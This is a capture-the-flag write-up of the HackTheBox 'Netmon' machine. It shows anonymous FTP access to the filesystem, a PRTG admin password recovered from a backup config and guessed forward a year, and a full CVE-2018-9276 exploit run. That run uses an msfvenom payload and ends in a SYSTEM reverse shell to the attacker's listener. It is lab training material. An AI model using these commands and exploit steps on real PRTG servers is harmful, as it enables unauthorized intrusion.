Netmon

In terms of pwns it goes Devel > OpenAdmin > Netmon but I’ve already done OpenAdmin so this is Netmon. Looking at the IP it’s fairly high (10.10.10.152), I reckon it is from not long before I joined HTB. I’ve never tried it before.

Ports

There are lots of ports:

  1. 21/tcp open ftp
  2. 80/tcp open http
  3. 135/tcp open msrpc
  4. 139/tcp open netbios-ssn
  5. 445/tcp open microsoft-ds
  6. 5985/tcp open wsman
  7. 47001/tcp open winrm
  8. 49664/tcp open unknown
  9. 49665/tcp open unknown
  10. 49666/tcp open unknown
  11. 49667/tcp open unknown
  12. 49668/tcp open unknown
  13. 49669/tcp open unknown

I run detail scans against everything below 49664; the main pertinent points are anonymous FTP access and PRTG Network Monitor on port 80. Network Monitor; obviously where the name comes from.

FTP

We can login to FTP and we get access to the entire filesystem, although we can’t read everything. We do get the user flag here though, which must be the most trivial HTB user flag ever.

Some research reveals we have an authenticated RCE for PRTG Network Monitor but the default credentials (prtgadmin/prtgadmin) aren’t working. Presumably then we need to find some creds via this FTP connection.

Creds

We do find some relevant files:

PRTG Configuration.dat

This contains passwords, but they are encrypted and we don’t have the ability to decrypt them. We also find:

PRTG Configuration.old.bak

This contains some plaintext credentials:

prtgadmin:PrTg@dmin2018

However this doesn’t work either. Hmmmm. This box was worked on in 2019 - what if we try PrTg@dmin2019? Bingo!

Now for the exploit. I try the script from exploitdb but it doesn’t seem to work; I may have done something wrong. I find another one on github, but it’s written for python2 and wants the python2 version of impacket. We can get those:

┌──(root💀kali)-[/tmp]
└─# wget https://bootstrap.pypa.io/2.7/get-pip.py                                                                                                  
--2021-03-06 05:12:02--  https://bootstrap.pypa.io/2.7/get-pip.py
Resolving bootstrap.pypa.io (bootstrap.pypa.io)... 151.101.80.175, 2a04:4e42:13::175
Connecting to bootstrap.pypa.io (bootstrap.pypa.io)|151.101.80.175|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1908226 (1.8M) [text/x-python]
Saving to: ‘get-pip.py
┌──(root💀kali)-[/tmp]
└─# pip2 --version
pip 20.3.4 from /usr/local/lib/python2.7/dist-packages/pip (python 2.7)
# we need to upgrade setuptools or it won't work
┌──(root💀kali)-[/tmp]
└─# pip2 install --upgrade setuptools 
# etc etc
┌──(root💀kali)-[/tmp]
└─# pip2 install impacket  
# etc etc

Now we can run the exploit:

python CVE-2018-9276.py -i 10.10.10.152 -p 80 --lhost 10.10.14.2 --lport 443 --user prtgadmin --password PrTg%40dmin2019 

┌──(root💀kali)-[/opt/htb/netmon/exploit/CVE-2018-9276]
└─# python CVE-2018-9276.py -i 10.10.10.152 -p 80 --lhost 10.10.14.2 --lport 443 --user prtgadmin --password PrTg%40dmin2019
[+] [PRTG/18.1.37.13946] is Vulnerable!

[*] Exploiting [10.10.10.152:80] as [prtgadmin/PrTg%40dmin2019]
[+] Session obtained for [prtgadmin:PrTg%40dmin2019]
[+] File staged at [C:\Users\Public\tester.txt] successfully with objid of [2018]
[+] Session obtained for [prtgadmin:PrTg%40dmin2019]
[+] Notification with objid [2018] staged for execution
[*] Generate msfvenom payload with [LHOST=10.10.14.2 LPORT=443 OUTPUT=/tmp/iyapbdvy.dll]
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 8704 bytes
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Hosting payload at [\\10.10.14.2\GBTBTONH]
[+] Session obtained for [prtgadmin:PrTg%40dmin2019]
[+] Command staged at [C:\Users\Public\tester.txt] successfully with objid of [2019]
[+] Session obtained for [prtgadmin:PrTg%40dmin2019]
[+] Notification with objid [2019] staged for execution
[*] Attempting to kill the impacket thread
[-] Impacket will maintain its own thread for active connections, so you may find it's still listening on <LHOST>:445!
[-] ps aux | grep <script name> and kill -9 <pid> if it is still running :)
[-] The connection will eventually time out.

[+] Listening on [10.10.14.2:443 for the reverse shell!]
listening on [any] 443 ...
[*] Incoming connection (10.10.10.152,49735)
[*] AUTHENTICATE_MESSAGE (\,NETMON)
[*] User NETMON\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.152] 49740
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>[*] Disconnecting Share(1:IPC$)
whoami
whoami
nt authority\system

C:\Windows\system32>

Win. Next is Bashed; that’s for tomorrow.